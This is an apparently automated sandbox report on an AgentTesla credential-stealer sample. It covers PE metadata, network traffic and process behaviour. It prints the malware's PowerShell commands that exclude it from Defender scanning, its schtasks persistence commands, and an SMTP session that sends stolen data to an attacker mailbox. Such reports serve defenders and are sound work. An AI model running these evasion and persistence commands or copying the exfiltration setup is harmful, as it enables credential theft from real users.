                                                                    SHA1:fdaaf599b51a6d13dda0bada44108dca334edddc
                                                                    SHA256:63382a3cc1e90e7dfa54826a62bfb5da86f4ad44a07cffca70fa3c509bbd5ad7
                                                                    SHA512:c181330b79ccddc07c425172d83a48b29546f7197fab39a952c3db2c0e7b702368b10184e4a35cf2777f996d76fb80324a8dee70e6f641c085d7965ad9bb5e84
                                                                    SSDEEP:12288:npZsS/+l1pZQw1IvCtrVakpFGojVg3bInwCSfJqni4XVXlfo6jPIl0OmiWjKy9Uj:nzsBpz1/tr91jnw7Yi4XRxPjPIKiWjM
                                                                    TLSH:A435F63D29BE222BE1B5C3B7CBDBE427F534986F3111AD6458D343A94346A4634C326E
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....9...............0.............j.... ... ....@.. .......................`............@................................

                                                                    File Icon

                                                                    Icon Hash:1133333969613167

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x4e146a
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:true
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0xCA399BA7 [Tue Jul 6 04:57:11 2077 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                    Authenticode Signature

                                                                    Signature Valid:false
                                                                    Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                    Error Number:-2146869232
                                                                    Not Before, Not After
                                                                    • 12/11/2018 19:00:00 08/11/2021 18:59:59
                                                                    Subject Chain
                                                                    • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                    Version:3
                                                                    Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                    Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                    Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                    Serial:7C1118CBBADC95DA3752C46E47A27438

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    jmp dword ptr [00402000h]
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xe14160x4f.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xe20000x202d4.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0xffe000x3608
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1040000xc.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0xdfb100x70.text
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x20000xdf4700xdf600193dc2b6c242c85884fa9455fe7fbb66False0.752333476147174data7.195168556276966IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rsrc0xe20000x202d40x20400c2cfab27fe8f8caf0f22aeae8fd68483False0.6211997335271318data6.70138254071251IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0x1040000xc0x20007c38555518634dde51acead93d1e41bFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    RT_ICON0xe21f00xb8aaPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced1.0002961458729958
                                                                    RT_ICON0xeda9c0x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.3685821601798178
                                                                    RT_ICON0xfe2c40x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.5408713692946058
                                                                    RT_ICON0x10086c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.6803470919324578
                                                                    RT_ICON0x1019140x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.8049645390070922
                                                                    RT_GROUP_ICON0x101d7c0x4cdata0.75
                                                                    RT_VERSION0x101dc80x320data0.4525
                                                                    RT_MANIFEST0x1020e80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                    Imports

                                                                    DLLImport
                                                                    mscoree.dll_CorExeMain

                                                                    Network Behavior

                                                                    Suricata IDS Alerts

                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                    2024-12-04T12:52:54.945943+01002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.749710193.141.65.39587TCP
                                                                    2024-12-04T12:52:54.945943+01002839723ETPRO MALWARE Win32/Agent Tesla SMTP Activity1192.168.2.749710193.141.65.39587TCP

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 4, 2024 12:53:05.308562994 CET49707587192.168.2.7193.141.65.39
                                                                    Dec 4, 2024 12:53:05.428525925 CET58749707193.141.65.39192.168.2.7
                                                                    Dec 4, 2024 12:53:05.428652048 CET49707587192.168.2.7193.141.65.39
                                                                    Dec 4, 2024 12:53:10.995049000 CET49707587192.168.2.7193.141.65.39
                                                                    Dec 4, 2024 12:53:11.457041979 CET49710587192.168.2.7193.141.65.39
                                                                    Dec 4, 2024 12:53:11.577255964 CET58749710193.141.65.39192.168.2.7
                                                                    Dec 4, 2024 12:53:11.580701113 CET49710587192.168.2.7193.141.65.39
                                                                    Dec 4, 2024 12:53:13.343214035 CET58749710193.141.65.39192.168.2.7
                                                                    Dec 4, 2024 12:53:13.344149113 CET49710587192.168.2.7193.141.65.39
                                                                    Dec 4, 2024 12:53:13.464041948 CET58749710193.141.65.39192.168.2.7
                                                                    Dec 4, 2024 12:53:13.831944942 CET58749710193.141.65.39192.168.2.7
                                                                    Dec 4, 2024 12:53:13.833244085 CET49710587192.168.2.7193.141.65.39
                                                                    Dec 4, 2024 12:53:13.953227997 CET58749710193.141.65.39192.168.2.7
                                                                    Dec 4, 2024 12:53:14.319787979 CET58749710193.141.65.39192.168.2.7
                                                                    Dec 4, 2024 12:53:14.346460104 CET49710587192.168.2.7193.141.65.39
                                                                    Dec 4, 2024 12:53:14.466371059 CET58749710193.141.65.39192.168.2.7
                                                                    Dec 4, 2024 12:53:14.849009991 CET58749710193.141.65.39192.168.2.7
                                                                    Dec 4, 2024 12:53:14.849431992 CET49710587192.168.2.7193.141.65.39
                                                                    Dec 4, 2024 12:53:14.969274044 CET58749710193.141.65.39192.168.2.7
                                                                    Dec 4, 2024 12:53:15.336148977 CET58749710193.141.65.39192.168.2.7
                                                                    Dec 4, 2024 12:53:15.336503983 CET49710587192.168.2.7193.141.65.39
                                                                    Dec 4, 2024 12:53:15.456528902 CET58749710193.141.65.39192.168.2.7
                                                                    Dec 4, 2024 12:53:26.323152065 CET58749710193.141.65.39192.168.2.7
                                                                    Dec 4, 2024 12:53:26.324940920 CET49710587192.168.2.7193.141.65.39
                                                                    Dec 4, 2024 12:53:26.444688082 CET58749710193.141.65.39192.168.2.7
                                                                    Dec 4, 2024 12:53:26.814351082 CET58749710193.141.65.39192.168.2.7
                                                                    Dec 4, 2024 12:53:26.815817118 CET49710587192.168.2.7193.141.65.39
                                                                    Dec 4, 2024 12:53:26.815896988 CET49710587192.168.2.7193.141.65.39
                                                                    Dec 4, 2024 12:53:26.815912962 CET49710587192.168.2.7193.141.65.39
                                                                    Dec 4, 2024 12:53:26.815933943 CET49710587192.168.2.7193.141.65.39
                                                                    Dec 4, 2024 12:53:26.935693026 CET58749710193.141.65.39192.168.2.7
                                                                    Dec 4, 2024 12:53:26.935709000 CET58749710193.141.65.39192.168.2.7
                                                                    Dec 4, 2024 12:53:26.935820103 CET58749710193.141.65.39192.168.2.7
                                                                    Dec 4, 2024 12:53:26.935830116 CET58749710193.141.65.39192.168.2.7
                                                                    Dec 4, 2024 12:53:27.555697918 CET58749710193.141.65.39192.168.2.7
                                                                    Dec 4, 2024 12:53:27.601943016 CET49710587192.168.2.7193.141.65.39
                                                                    Dec 4, 2024 12:54:51.289989948 CET49710587192.168.2.7193.141.65.39
                                                                    Dec 4, 2024 12:54:51.410550117 CET58749710193.141.65.39192.168.2.7

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 4, 2024 12:53:04.796806097 CET5557153192.168.2.71.1.1.1
                                                                    Dec 4, 2024 12:53:05.269452095 CET53555711.1.1.1192.168.2.7

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Dec 4, 2024 12:53:04.796806097 CET192.168.2.71.1.1.10xbeccStandard query (0)mail.azmaplast.comA (IP address)IN (0x0001)false

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Dec 4, 2024 12:53:05.269452095 CET1.1.1.1192.168.2.70xbeccNo error (0)mail.azmaplast.com193.141.65.39A (IP address)IN (0x0001)false

                                                                    SMTP Packets

                                                                    TimestampSource PortDest PortSource IPDest IPCommands
                                                                    Dec 4, 2024 12:53:13.343214035 CET58749710193.141.65.39192.168.2.7220 lh222.irandns.com mail server
                                                                    Dec 4, 2024 12:53:13.344149113 CET49710587192.168.2.7193.141.65.39EHLO 932923
                                                                    Dec 4, 2024 12:53:13.831944942 CET58749710193.141.65.39192.168.2.7250-lh222.irandns.com Hello 932923 [8.46.123.228]
                                                                    250-SIZE 524288000
                                                                    250-LIMITS MAILMAX=100 RCPTMAX=150
                                                                    250-8BITMIME
                                                                    250-PIPELINING
                                                                    250-PIPECONNECT
                                                                    250-AUTH PLAIN LOGIN
                                                                    250-STARTTLS
                                                                    250 HELP
                                                                    Dec 4, 2024 12:53:13.833244085 CET49710587192.168.2.7193.141.65.39AUTH login aW5mb0Bhem1hcGxhc3QuY29t
                                                                    Dec 4, 2024 12:53:14.319787979 CET58749710193.141.65.39192.168.2.7334 UGFzc3dvcmQ6
                                                                    Dec 4, 2024 12:53:14.849009991 CET58749710193.141.65.39192.168.2.7235 Authentication succeeded
                                                                    Dec 4, 2024 12:53:14.849431992 CET49710587192.168.2.7193.141.65.39MAIL FROM:<info@azmaplast.com>
                                                                    Dec 4, 2024 12:53:15.336148977 CET58749710193.141.65.39192.168.2.7250 OK
                                                                    Dec 4, 2024 12:53:15.336503983 CET49710587192.168.2.7193.141.65.39RCPT TO:<blessedpeter001@gmail.com>
                                                                    Dec 4, 2024 12:53:26.323152065 CET58749710193.141.65.39192.168.2.7250 Accepted
                                                                    Dec 4, 2024 12:53:26.324940920 CET49710587192.168.2.7193.141.65.39DATA
                                                                    Dec 4, 2024 12:53:26.814351082 CET58749710193.141.65.39192.168.2.7354 Enter message, ending with "." on a line by itself
                                                                    Dec 4, 2024 12:53:26.815933943 CET49710587192.168.2.7193.141.65.39.
                                                                    Dec 4, 2024 12:53:27.555697918 CET58749710193.141.65.39192.168.2.7250 OK id=1tInwc-00000000CtF-2PEY
                                                                    Dec 4, 2024 12:54:51.289989948 CET49710587192.168.2.7193.141.65.39QUIT

                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Target ID:0
                                                                    Start time:06:52:57
                                                                    Start date:04/12/2024
                                                                    Path:C:\Users\user\Desktop\AWB#150332.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\AWB#150332.exe"
                                                                    Imagebase:0xd90000
                                                                    File size:1'061'896 bytes
                                                                    MD5 hash:DEF8249DC6DF546F68CE491EE14282C9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1259265400.0000000004169000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1259265400.0000000004169000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:3
                                                                    Start time:06:53:01
                                                                    Start date:04/12/2024
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AWB#150332.exe"
                                                                    Imagebase:0x90000
                                                                    File size:433'152 bytes
                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:4
                                                                    Start time:06:53:01
                                                                    Start date:04/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff75da10000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:5
                                                                    Start time:06:53:01
                                                                    Start date:04/12/2024
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe"
                                                                    Imagebase:0x90000
                                                                    File size:433'152 bytes
                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:6
                                                                    Start time:06:53:01
                                                                    Start date:04/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff75da10000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:7
                                                                    Start time:06:53:01
                                                                    Start date:04/12/2024
                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmpFFF1.tmp"
                                                                    Imagebase:0x2e0000
                                                                    File size:187'904 bytes
                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:8
                                                                    Start time:06:53:01
                                                                    Start date:04/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x1a0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:9
                                                                    Start time:06:53:01
                                                                    Start date:04/12/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                    Imagebase:0xae0000
                                                                    File size:45'984 bytes
                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.1333001679.0000000002EA2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1329772282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.1329772282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1333001679.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.1333001679.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:12
                                                                    Start time:06:53:03
                                                                    Start date:04/12/2024
                                                                    Path:C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe
                                                                    Imagebase:0x880000
                                                                    File size:1'061'896 bytes
                                                                    MD5 hash:DEF8249DC6DF546F68CE491EE14282C9
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 26%, ReversingLabs
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:13
                                                                    Start time:06:53:04
                                                                    Start date:04/12/2024
                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                    Imagebase:0x7ff7fb730000
                                                                    File size:496'640 bytes
                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:19
                                                                    Start time:06:53:08
                                                                    Start date:04/12/2024
                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmp1CDF.tmp"
                                                                    Imagebase:0x2e0000
                                                                    File size:187'904 bytes
                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:20
                                                                    Start time:06:53:08
                                                                    Start date:04/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff75da10000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:21
                                                                    Start time:06:53:08
                                                                    Start date:04/12/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                    Imagebase:0xb50000
                                                                    File size:45'984 bytes
                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000015.00000002.2468581975.0000000002F4B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000015.00000002.2468581975.0000000002F43000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.2468581975.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000015.00000002.2468581975.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:22
                                                                    Start time:06:53:11
                                                                    Start date:04/12/2024
                                                                    Path:C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
                                                                    Imagebase:0xbd0000
                                                                    File size:45'984 bytes
                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 0%, ReversingLabs
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:23
                                                                    Start time:06:53:11
                                                                    Start date:04/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff75da10000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:25
                                                                    Start time:06:53:19
                                                                    Start date:04/12/2024
                                                                    Path:C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
                                                                    Imagebase:0xba0000
                                                                    File size:45'984 bytes
                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:26
                                                                    Start time:06:53:19
                                                                    Start date:04/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff75da10000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Disassembly

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:10.4%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:95
                                                                      Total number of Limit Nodes:6
